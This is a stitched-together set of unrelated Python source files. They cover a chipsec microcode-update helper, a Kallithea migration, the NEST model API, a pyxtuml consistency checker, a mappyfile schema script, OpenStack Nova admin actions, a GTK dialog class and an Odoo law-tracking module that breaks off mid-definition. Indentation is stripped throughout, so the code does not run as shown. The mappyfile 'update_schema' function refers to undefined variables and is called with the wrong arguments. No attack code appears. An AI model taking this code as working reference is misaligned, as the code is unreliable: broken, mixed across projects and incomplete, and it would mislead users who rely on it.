from chipsec.logger import *
from chipsec.hal.physmem import *
from chipsec.hal.msr import *
from chipsec.file import *
IA32_MSR_BIOS_UPDT_TRIG = 0x79
IA32_MSR_BIOS_SIGN_ID = 0x8B
IA32_MSR_BIOS_SIGN_ID_STATUS = 0x1
from collections import namedtuple
class UcodeUpdateHeader( namedtuple('UcodeUpdateHeader', 'header_version update_revision date processor_signature checksum loader_revision processor_flags data_size total_size reserved1 reserved2 reserved3') ):
__slots__ = ()
def __str__(self):
return """
Microcode Update Header
--------------------------------
Header Version : 0x%08X
Update Revision : 0x%08X
Date : 0x%08X
Processor Signature : 0x%08X
Checksum : 0x%08X
Loader Revision : 0x%08X
Processor Flags : 0x%08X
Update Data Size : 0x%08X
Total Size : 0x%08X
Reserved1 : 0x%08X
Reserved2 : 0x%08X
Reserved3 : 0x%08X
""" % ( self.header_version, self.update_revision, self.date, self.processor_signature, self.checksum, self.loader_revision, self.processor_flags, self.data_size, self.total_size, self.reserved1, self.reserved2, self.reserved3 )
UCODE_HEADER_SIZE = 0x30
def dump_ucode_update_header( pdb_ucode_buffer ):
ucode_header = UcodeUpdateHeader( *struct.unpack_from( '12I', pdb_ucode_buffer ) )
print ucode_header
return ucode_header
def read_ucode_file( ucode_filename ):
ucode_buf = read_file( ucode_filename )
if (ucode_filename.endswith('.pdb')):
if logger().VERBOSE:
logger().log( "[ucode] PDB file '%.256s' has ucode update header (size = 0x%X)" % (ucode_filename, UCODE_HEADER_SIZE) )
dump_ucode_update_header( ucode_buf )
return ucode_buf[UCODE_HEADER_SIZE:]
else:
return ucode_buf
class Ucode:
def __init__( self, cs ):
self.helper = cs.helper
self.cs = cs
# @TODO remove later/replace with msr.get_cpu_thread_count()
def get_cpu_thread_count( self ):
(core_thread_count, dummy) = self.helper.read_msr( 0, Cfg.IA32_MSR_CORE_THREAD_COUNT )
return (core_thread_count & Cfg.IA32_MSR_CORE_THREAD_COUNT_THREADCOUNT_MASK)
def ucode_update_id(self, cpu_thread_id):
#self.helper.write_msr( cpu_thread_id, IA32_MSR_BIOS_SIGN_ID, 0, 0 )
#self.helper.cpuid( cpu_thread_id, 0 )
(bios_sign_id_lo, bios_sign_id_hi) = self.helper.read_msr( cpu_thread_id, IA32_MSR_BIOS_SIGN_ID )
ucode_update_id = bios_sign_id_hi
if (bios_sign_id_lo & IA32_MSR_BIOS_SIGN_ID_STATUS):
if logger().VERBOSE: logger().log( "[ucode] CPU%d: last Microcode update failed (current microcode id = 0x%08X)" % (cpu_thread_id, ucode_update_id) )
else:
if logger().VERBOSE: logger().log( "[ucode] CPU%d: Microcode update ID = 0x%08X" % (cpu_thread_id, ucode_update_id) )
return ucode_update_id
def update_ucode_all_cpus(self, ucode_file ):
if not ( os.path.exists(ucode_file) and os.path.isfile(ucode_file) ):
logger().error( "Ucode file not found: '%.256s'" % ucode_file )
return False
ucode_buf = read_ucode_file( ucode_file )
if (ucode_buf is not None) and (len(ucode_buf) > 0):
for tid in range(self.get_cpu_thread_count()):
self.load_ucode_update( tid, ucode_buf )
return True
def update_ucode(self, cpu_thread_id, ucode_file ):
if not ( os.path.exists(ucode_file) and os.path.isfile(ucode_file) ):
logger().error( "Ucode file not found: '%.256s'" % ucode_file )
return False
_ucode_buf = read_ucode_file( ucode_file )
return self.load_ucode_update( cpu_thread_id, _ucode_buf )
def load_ucode_update(self, cpu_thread_id, ucode_buf ):
if logger().HAL: logger().log( "[ucode] loading microcode update on CPU%d" % cpu_thread_id )
self.helper.load_ucode_update( cpu_thread_id, ucode_buf )
return self.ucode_update_id( cpu_thread_id )
|
import logging
from sqlalchemy import *
from kallithea.lib.dbmigrate.migrate import *
from kallithea.lib.dbmigrate.migrate.changeset import *
log = logging.getLogger(__name__)
def upgrade(migrate_engine):
"""
Upgrade operations go here.
Don't create your own engine; bind migrate_engine to your metadata
"""
#==========================================================================
# CHANGESET_COMMENTS
#==========================================================================
from kallithea.lib.dbmigrate.schema.db_1_4_0 import ChangesetComment
tbl_name = ChangesetComment.__tablename__
tbl = Table(tbl_name,
MetaData(bind=migrate_engine), autoload=True,
autoload_with=migrate_engine)
col = tbl.columns.revision
# remove nullability from revision field
col.alter(nullable=True)
#==========================================================================
# REPOSITORY
#==========================================================================
from kallithea.lib.dbmigrate.schema.db_1_4_0 import Repository
tbl = Repository.__table__
updated_on = Column('updated_on', DateTime(timezone=False),
nullable=True, unique=None)
# create created on column for future lightweight main page
updated_on.create(table=tbl)
def downgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
|
# -*- coding: utf-8 -*-
#
# hl_api_models.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""
Functions for model handling
"""
from .hl_api_helper import *
@check_stack
def Models(mtype="all", sel=None):
"""Return a tuple of all available model (neurons, devices and
synapses) names, sorted by name.
Parameters
----------
mtype : str, optional
Use mtype='nodes' to only see neuron and device models,
or mtype='synapses' to only see synapse models.
sel : str, optional
String used to filter the result list and only return models
containing it.
Returns
-------
tuple:
Available model names
Notes
-----
- Synapse model names ending with '_hpc' provide minimal memory
requirements by using thread-local target neuron IDs and fixing
the `rport` to 0.
- Synapse model names ending with '_lbl' allow to assign an individual
integer label (`synapse_label`) to created synapses at the cost
of increased memory requirements.
Raises
------
ValueError
Description
"""
if mtype not in ("all", "nodes", "synapses"):
raise ValueError("type has to be one of 'all', 'nodes' or 'synapses'")
models = []
if mtype in ("all", "nodes"):
sr("modeldict")
models += spp().keys()
if mtype in ("all", "synapses"):
sr("synapsedict")
models += spp().keys()
if sel is not None:
models = [x for x in models if x.find(sel) >= 0]
models.sort()
return tuple(models)
@check_stack
def ConnectionRules():
"""Return a typle of all available connection rules, sorted by name.
Returns
-------
tuple:
Available connection rules
"""
sr('connruledict')
return tuple(sorted(spp().keys()))
@check_stack
def SetDefaults(model, params, val=None):
"""Set the default parameters of the given model to the values
specified in the params dictionary.
New default values are used for all subsequently created instances
of the model.
Parameters
----------
model : str
Name of the model
params : str or dict
Dictionary of new default values. If val is given, this has to
be the name of a model property as a str.
val : str, optional
If given, params has to be the name of a model property.
"""
if val is not None:
if is_literal(params):
params = {params: val}
sps(params)
sr('/{0} exch SetDefaults'.format(model))
@check_stack
def GetDefaults(model, keys=None):
"""Return a dictionary with the default parameters of the given
model, specified by a string.
Parameters
----------
model : str
Name of the model
keys : str or list, optional
String or a list of strings naming model properties. GetDefaults then
returns a single value or a list of values belonging to the keys
given.
Returns
-------
dict:
All default parameters
type:
If keys is a string, the corrsponding default parameter is returned
list:
If keys is a list of strings, a list of corrsponding default parameters
is returned
Raises
------
TypeError
Examples
--------
GetDefaults('iaf_psc_alpha','V_m') -> -70.0
GetDefaults('iaf_psc_alpha',['V_m', 'model']) -> [-70.0, 'iaf_psc_alpha']
"""
if keys is None:
cmd = "/{0} GetDefaults".format(model)
elif is_literal(keys):
cmd = '/{0} GetDefaults /{1} get'.format(model, keys)
elif is_iterable(keys):
keys_str = " ".join("/{0}".format(x) for x in keys)
cmd = "/{0} GetDefaults [ {1} ] {{ 1 index exch get }}"\
.format(model, keys_str) + " Map exch pop"
else:
raise TypeError("keys should be either a string or an iterable")
sr(cmd)
return spp()
@check_stack
def CopyModel(existing, new, params=None):
"""Create a new model by copying an existing one.
Parameters
----------
existing : str
Name of existing model
new : str
Name of the copy of the existing model
params : dict, optional
Default parameters assigned to the copy. Not provided parameters are
taken from the existing model.
"""
model_deprecation_warning(existing)
if params is not None:
sps(params)
sr("/%s /%s 3 2 roll CopyModel" % (existing, new))
else:
sr("/%s /%s CopyModel" % (existing, new))
|
# encoding: utf-8
# Copyright (C) 2017 John Törnblom
#
# This file is part of pyxtuml.
#
# pyxtuml is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# pyxtuml is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with pyxtuml. If not, see <http://www.gnu.org/licenses/>.
'''
Check an xtuml model for association constraint violations in its metamodel.
'''
import logging
import optparse
import sys
import xtuml
logger = logging.getLogger('consistency_check')
def pretty_to_link(inst, link):
'''
Create a human-readable representation of a link on the 'TO'-side
'''
values = ''
prefix = ''
metaclass = xtuml.get_metaclass(inst)
for name, ty in metaclass.attributes:
if name in link.key_map:
value = getattr(inst, name)
value = xtuml.serialize_value(value, ty)
name = link.key_map[name]
values += '%s%s=%s' % (prefix, name, value)
prefix = ', '
return '%s(%s)' % (link.kind, values)
def pretty_from_link(inst, link):
'''
Create a human-readable representation of a link on the 'FROM'-side
'''
values = ''
prefix = ''
metaclass = xtuml.get_metaclass(inst)
for name, ty in metaclass.attributes:
if name in link.key_map:
value = getattr(inst, name)
value = xtuml.serialize_value(value, ty)
values += '%s%s=%s' % (prefix, name, value)
prefix = ', '
return '%s(%s)' % (metaclass.kind, values)
def pretty_unique_identifier(inst, identifier):
'''
Create a human-readable representation a unique identifier.
'''
values = ''
prefix = ''
metaclass = xtuml.get_metaclass(inst)
for name, ty in metaclass.attributes:
if name in metaclass.identifying_attributes:
value = getattr(inst, name)
value = xtuml.serialize_value(value, ty)
values += '%s%s=%s' % (prefix, name, value)
prefix = ', '
return '%s(%s)' % (identifier, values)
def check_uniqueness_constraint(m, kind=None):
'''
Check the model for uniqueness constraint violations.
'''
if kind is None:
metaclasses = m.metaclasses.values()
else:
metaclasses = [m.find_metaclass(kind)]
res = 0
for metaclass in metaclasses:
id_map = dict()
for identifier in metaclass.indices:
id_map[identifier] = dict()
for inst in metaclass.select_many():
# Check for null-values
for name, ty in metaclass.attributes:
if name not in metaclass.identifying_attributes:
continue
value = getattr(inst, name)
isnull = value is None
isnull |= (ty == 'UNIQUE_ID' and not value)
if isnull:
res += 1
logger.warning('%s.%s is part of an identifier and is null'
% (metaclass.kind, name))
# Check uniqueness
for identifier in metaclass.indices:
kwargs = dict()
for name in metaclass.indices[identifier]:
kwargs[name] = getattr(inst, name)
index_key = frozenset(kwargs.items())
if index_key in id_map[identifier]:
res += 1
id_string = pretty_unique_identifier(inst, identifier)
logger.warning('uniqueness constraint violation in %s, %s'
% (metaclass.kind, id_string))
id_map[identifier][index_key] = inst
return res
def check_link_integrity(m, link):
'''
Check the model for integrity violations on an association in a particular direction.
'''
res = 0
for inst in link.from_metaclass.select_many():
q_set = list(link.navigate(inst))
if(len(q_set) < 1 and not link.conditional) or (
(len(q_set) > 1 and not link.many)):
res += 1
logger.warning('integrity violation in '
'%s --(%s)--> %s' % (pretty_from_link(inst, link),
link.rel_id,
pretty_to_link(inst, link)))
return res
def check_subtype_integrity(m, super_kind, rel_id):
'''
Check the model for integrity violations across a subtype association.
'''
if isinstance(rel_id, int):
rel_id = 'R%d' % rel_id
res = 0
for inst in m.select_many(super_kind):
if not xtuml.navigate_subtype(inst, rel_id):
res += 1
logger.warning('integrity violation across '
'%s[%s]' % (super_kind, rel_id))
return res
def check_association_integrity(m, rel_id=None):
'''
Check the model for integrity violations on association(s).
'''
if isinstance(rel_id, int):
rel_id = 'R%d' % rel_id
res = 0
for ass in m.associations:
if rel_id in [ass.rel_id, None]:
res += check_link_integrity(m, ass.source_link)
res += check_link_integrity(m, ass.target_link)
return res
def main(args):
parser = optparse.OptionParser(usage="%prog [options] <sql_file> [another_sql_file...].",
version=xtuml.version.complete_string,
formatter=optparse.TitledHelpFormatter())
parser.set_description(__doc__.strip())
parser.add_option("-r", "-R", dest="rel_ids", type='int', metavar="<number>",
help="limit consistency check to one or more associations",
action="append", default=[])
parser.add_option("-k", dest="kinds", type='string', metavar="<key letter>",
help="limit check for uniqueness constraint violations to one or more classes",
action="append", default=[])
parser.add_option("-v", "--verbosity", dest='verbosity', action="count",
help="increase debug logging level", default=1)
(opts, args) = parser.parse_args(args)
if len(args) == 0:
parser.print_help()
sys.exit(1)
levels = {
0: logging.ERROR,
1: logging.WARNING,
2: logging.INFO,
3: logging.DEBUG,
}
logging.basicConfig(level=levels.get(opts.verbosity, logging.DEBUG))
loader = xtuml.ModelLoader()
for filename in args:
loader.filename_input(filename)
m = loader.build_metamodel()
error = 0
for rel_id in opts.rel_ids:
error += xtuml.check_association_integrity(m, rel_id)
if not opts.rel_ids:
error += xtuml.check_association_integrity(m)
for kind in opts.kinds:
error += xtuml.check_uniqueness_constraint(m, kind)
if not opts.kinds:
error += xtuml.check_uniqueness_constraint(m)
return error
if __name__ == '__main__':
num_errors = main(sys.argv[1:])
sys.exit(num_errors > 0)
|
"""
jsonref
Docs
C:\VirtualEnvs\mappyfile\Scripts\activate.bat
SET "input_folder=D:\GitHub\mappyfile\mappyfile\schemas"
SET "output_folder=D:\GitHub\mappyfile\docs\schemas\"
jsonschema2rst %input_folder% %output_folder%
"""
import os
from pprint import pprint
import jsonref
from jsonref import JsonRef
def get_full_schema(schema_dir):
print(schema_dir)
os.chdir(schema_dir)
fn = "map.json"
uri = "file:///{}/".format(schema_dir)
with open(fn) as f:
j = jsonref.load(f, base_uri=uri)
jsn = jsonref.dumps(j, indent=4, sort_keys=False)
full_schema = jsonref.dumps(j, indent=4, sort_keys=False)
with open(r"C:\Temp\mapfile.json", "w") as f:
f.write(full_schema)
return full_schema
# create_versioned_schema
def update_schema(full_schema):
if isinstance(obj, dict):
for k in obj.keys():
if k == bad:
del obj[k]
else:
update_schema(obj[k], bad)
elif isinstance(obj, list):
for i in reversed(range(len(obj))):
if obj[i] == bad:
del obj[i]
else:
update_schema(obj[i], bad)
else:
# neither a dict nor a list, do nothing
pass
def main(schema_dir):
full_schema = get_full_schema(schema_dir)
update_schema(full_schema)
if __name__ == "__main__":
project_dir = os.path.dirname(os.path.dirname(__file__))
schema_dir = os.path.join(project_dir, "mappyfile", "schemas")
main(schema_dir)
print("Done!")
|
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os.path
import traceback
from oslo.utils import strutils
import six
import webob
from webob import exc
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova.compute import vm_states
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
# States usable in resetState action
state_map = dict(active=vm_states.ACTIVE, error=vm_states.ERROR)
def authorize(context, action_name):
action = 'admin_actions:%s' % action_name
extensions.extension_authorizer('compute', action)(context)
class AdminActionsController(wsgi.Controller):
def __init__(self, *args, **kwargs):
super(AdminActionsController, self).__init__(*args, **kwargs)
self.compute_api = compute.API()
# TODO(bcwaldon): These action names should be prefixed with 'os-'
@wsgi.action('pause')
def _pause(self, req, id, body):
"""Permit Admins to pause the server."""
ctxt = req.environ['nova.context']
authorize(ctxt, 'pause')
server = common.get_instance(self.compute_api, ctxt, id,
want_objects=True)
try:
self.compute_api.pause(ctxt, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'pause', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::pause %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('unpause')
def _unpause(self, req, id, body):
"""Permit Admins to unpause the server."""
ctxt = req.environ['nova.context']
authorize(ctxt, 'unpause')
server = common.get_instance(self.compute_api, ctxt, id,
want_objects=True)
try:
self.compute_api.unpause(ctxt, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'unpause', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::unpause %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('suspend')
def _suspend(self, req, id, body):
"""Permit admins to suspend the server."""
context = req.environ['nova.context']
authorize(context, 'suspend')
server = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.suspend(context, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'suspend', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("compute.api::suspend %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('resume')
def _resume(self, req, id, body):
"""Permit admins to resume the server from suspend."""
context = req.environ['nova.context']
authorize(context, 'resume')
server = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.resume(context, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'resume', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("compute.api::resume %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('migrate')
def _migrate(self, req, id, body):
"""Permit admins to migrate a server to a new host."""
context = req.environ['nova.context']
authorize(context, 'migrate')
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.resize(req.environ['nova.context'], instance)
except exception.QuotaError as error:
raise exc.HTTPForbidden(explanation=error.format_message())
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'migrate', id)
except exception.InstanceNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.NoValidHost as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
except Exception as e:
LOG.exception(_LE("Error in migrate %s"), e)
raise exc.HTTPBadRequest()
return webob.Response(status_int=202)
@wsgi.action('resetNetwork')
def _reset_network(self, req, id, body):
"""Permit admins to reset networking on a server."""
context = req.environ['nova.context']
authorize(context, 'resetNetwork')
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.reset_network(context, instance)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::reset_network %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('injectNetworkInfo')
def _inject_network_info(self, req, id, body):
"""Permit admins to inject network info into a server."""
context = req.environ['nova.context']
authorize(context, 'injectNetworkInfo')
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.inject_network_info(context, instance)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::inject_network_info %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('lock')
def _lock(self, req, id, body):
"""Lock a server instance."""
context = req.environ['nova.context']
authorize(context, 'lock')
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.lock(context, instance)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::lock %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('unlock')
def _unlock(self, req, id, body):
"""Unlock a server instance."""
context = req.environ['nova.context']
authorize(context, 'unlock')
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.unlock(context, instance)
except exception.PolicyNotAuthorized as e:
raise webob.exc.HTTPForbidden(explanation=e.format_message())
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::unlock %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('createBackup')
def _create_backup(self, req, id, body):
"""Backup a server instance.
Images now have an `image_type` associated with them, which can be
'snapshot' or the backup type, like 'daily' or 'weekly'.
If the image_type is backup-like, then the rotation factor can be
included and that will cause the oldest backups that exceed the
rotation factor to be deleted.
"""
context = req.environ["nova.context"]
authorize(context, 'createBackup')
entity = body["createBackup"]
try:
image_name = entity["name"]
backup_type = entity["backup_type"]
rotation = entity["rotation"]
except KeyError as missing_key:
msg = _("createBackup entity requires %s attribute") % missing_key
raise exc.HTTPBadRequest(explanation=msg)
except TypeError:
msg = _("Malformed createBackup entity")
raise exc.HTTPBadRequest(explanation=msg)
try:
rotation = int(rotation)
except ValueError:
msg = _("createBackup attribute 'rotation' must be an integer")
raise exc.HTTPBadRequest(explanation=msg)
if rotation < 0:
msg = _("createBackup attribute 'rotation' must be greater "
"than or equal to zero")
raise exc.HTTPBadRequest(explanation=msg)
props = {}
metadata = entity.get('metadata', {})
common.check_img_metadata_properties_quota(context, metadata)
try:
props.update(metadata)
except ValueError:
msg = _("Invalid metadata")
raise exc.HTTPBadRequest(explanation=msg)
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
image = self.compute_api.backup(context, instance, image_name,
backup_type, rotation, extra_properties=props)
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'createBackup', id)
resp = webob.Response(status_int=202)
# build location of newly-created image entity if rotation is not zero
if rotation > 0:
image_id = str(image['id'])
image_ref = os.path.join(req.application_url, 'images', image_id)
resp.headers['Location'] = image_ref
return resp
@wsgi.action('os-migrateLive')
def _migrate_live(self, req, id, body):
"""Permit admins to (live) migrate a server to a new host."""
context = req.environ["nova.context"]
authorize(context, 'migrateLive')
try:
block_migration = body["os-migrateLive"]["block_migration"]
disk_over_commit = body["os-migrateLive"]["disk_over_commit"]
host = body["os-migrateLive"]["host"]
except (TypeError, KeyError):
msg = _("host, block_migration and disk_over_commit must "
"be specified for live migration.")
raise exc.HTTPBadRequest(explanation=msg)
try:
block_migration = strutils.bool_from_string(block_migration,
strict=True)
disk_over_commit = strutils.bool_from_string(disk_over_commit,
strict=True)
except ValueError as err:
raise exc.HTTPBadRequest(explanation=six.text_type(err))
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.live_migrate(context, instance, block_migration,
disk_over_commit, host)
except (exception.NoValidHost,
exception.ComputeServiceUnavailable,
exception.InvalidHypervisorType,
exception.InvalidCPUInfo,
exception.UnableToMigrateToSelf,
exception.DestinationHypervisorTooOld,
exception.InvalidLocalStorage,
exception.InvalidSharedStorage,
exception.HypervisorUnavailable,
exception.InstanceNotRunning,
exception.MigrationPreCheckError) as ex:
raise exc.HTTPBadRequest(explanation=ex.format_message())
except exception.InstanceNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'os-migrateLive', id)
except Exception:
if host is None:
msg = _("Live migration of instance %s to another host "
"failed") % id
else:
msg = _("Live migration of instance %(id)s to host %(host)s "
"failed") % {'id': id, 'host': host}
LOG.exception(msg)
# Return messages from scheduler
raise exc.HTTPBadRequest(explanation=msg)
return webob.Response(status_int=202)
@wsgi.action('os-resetState')
def _reset_state(self, req, id, body):
"""Permit admins to reset the state of a server."""
context = req.environ["nova.context"]
authorize(context, 'resetState')
# Identify the desired state from the body
try:
state = state_map[body["os-resetState"]["state"]]
except (TypeError, KeyError):
msg = _("Desired state must be specified. Valid states "
"are: %s") % ', '.join(sorted(state_map.keys()))
raise exc.HTTPBadRequest(explanation=msg)
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
instance.vm_state = state
instance.task_state = None
instance.save(admin_state_reset=True)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::resetState %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
class Admin_actions(extensions.ExtensionDescriptor):
"""Enable admin-only server actions
Actions include: pause, unpause, suspend, resume, migrate,
resetNetwork, injectNetworkInfo, lock, unlock, createBackup
"""
name = "AdminActions"
alias = "os-admin-actions"
namespace = "http://docs.openstack.org/compute/ext/admin-actions/api/v1.1"
updated = "2011-09-20T00:00:00Z"
def get_controller_extensions(self):
controller = AdminActionsController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
|
import gtk
import pygtk
class messages:
def __init__(self):
# Dialog - Flags
# DIALOG_MODAL - make the dialog modal
# DIALOG_DESTROY_WITH_PARENT - destroy dialog when its parent is destroyed
# DIALOG_NO_SEPARATOR - omit the separator between the vbox and the action_area
self.Buttons = {}
#
def errorMsg(self, sText):
# gtk
ok = False
print 'errorMsg'
dialog = gtk.MessageDialog(None, gtk.DIALOG_DESTROY_WITH_PARENT, gtk.MESSAGE_ERROR,gtk.BUTTONS_CLOSE, sText);
dialog.run ();
dialog.destroy ();
return ok
def infoMsg(self, sText):
# gtk
ok = False
print 'infoMsg'
dialog = gtk.MessageDialog(None, gtk.DIALOG_DESTROY_WITH_PARENT, gtk.MESSAGE_INFO,gtk.BUTTONS_OK, sText);
dialog.run ();
dialog.destroy ();
return ok
def QuestionMsg(self, sText):
# gtk
ok = False
print 'QuestionMsg'
dialog = gtk.MessageDialog(None, gtk.DIALOG_DESTROY_WITH_PARENT, gtk.MESSAGE_QUESTION,gtk.BUTTONS_YES_NO, sText);
response = dialog.run ();
dialog.destroy ();
print 'Response', response
if response == gtk.RESPONSE_YES:
ok = True
return ok
|
# -*- coding: utf-8 -*-
import re
from openerp import netsvc
from datetime import datetime, date, timedelta
import time
from openerp.osv import osv, fields
from dateutil import relativedelta
from openerp import SUPERUSER_ID, tools
from openerp.tools.translate import _
from urllib import urlencode
import pytz
from urlparse import urljoin
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP, float_compare
_PROJECT_STATE = [('draft', 'New'),('open', 'In Progress'),('pending', 'Pending'), ('done', 'Done'), ('cancelled', 'Cancelled')]
class law_tracking_stage(osv.osv):
_name = 'law_tracking.stage'
_description = 'Law Project Stage'
_order = 'sequence'
_columns = {
'name': fields.char('Stage Name', required=True, size=64, translate=True),
'description': fields.text('Description'),
'sequence': fields.integer('Sequence'),
'state': fields.selection(_PROJECT_STATE, 'Related Status', required=True,
help="The status of your document is automatically changed regarding the selected stage. " \
"For example, if a stage is related to the status 'Close', when your document reaches this stage, it is automatically closed."),
# Seems that we are no longer using this field
# 'case_default': fields.boolean('Default for New Projects',
# help="If you check this field, this stage will be proposed by default on each new project. It will not assign this stage to existing projects."),
'law_project_ids': fields.many2many('law_tracking.project.type', 'law_project_stage_type_relation', 'stage_id', 'type_id', 'Law Projects'),
'fold': fields.boolean('Folded in Kanban View',
help='This stage is folded in the kanban view when'
'there are no records in that stage to display.'),
}
_defaults = {
'sequence': 1,
# 'law_project_ids': lambda self, cr, uid, ctx=None: self.pool['law_tracking.law_project']._get_default_project_id(cr, uid, context=ctx),
}
class law_tracking_project_type(osv.osv):
_name = 'law_tracking.project.type'
_description = 'Law Project Type'
_columns = {
'name': fields.char('Name', required=True, size=64, translate=True),
'stage_ids': fields.many2many('law_tracking.stage', 'law_project_stage_type_relation', 'type_id', 'stage_id', 'Tasks Stages',),
'unicameral': fields.boolean('Unicameral?',),
# TODO use this for filtering presenter on chamber
# 'entrance_chamber': fields.selection([(u'deputies', u'Deputies'), (u'senators', u'Senators')], string='Entrance Chamber', required=True),
}
class law_project(osv.osv):
""""""
_inherit = 'law_tracking.law_project'
_order = 'entry_date desc'
def _get_default_project_id(self, cr, uid, context=None):
""" Gives default section by checking if present in the context """
return (self._resolve_project_id_from_context(cr, uid, context=context) or False)
def _resolve_project_id_from_context(self, cr, uid, context=None):
""" Returns ID of project based on the value of 'default_project_id'
context key, or None if it cannot be resolved to a single
project.
"""
if context is None:
context = {}
if type(context.get('default_project_id')) in (int, long):
return context['default_project_id']
if isinstance(context.get('default_project_id'), basestring):
project_name = context['default_project_id']
project_ids = self.pool.get('law_tracking.law_project').name_search(cr, uid, name=project_name, context=context)
if len(project_ids) == 1:
return project_ids[0][0]
return None
def get_subscriber(self, cr, uid, user_id, context=None):
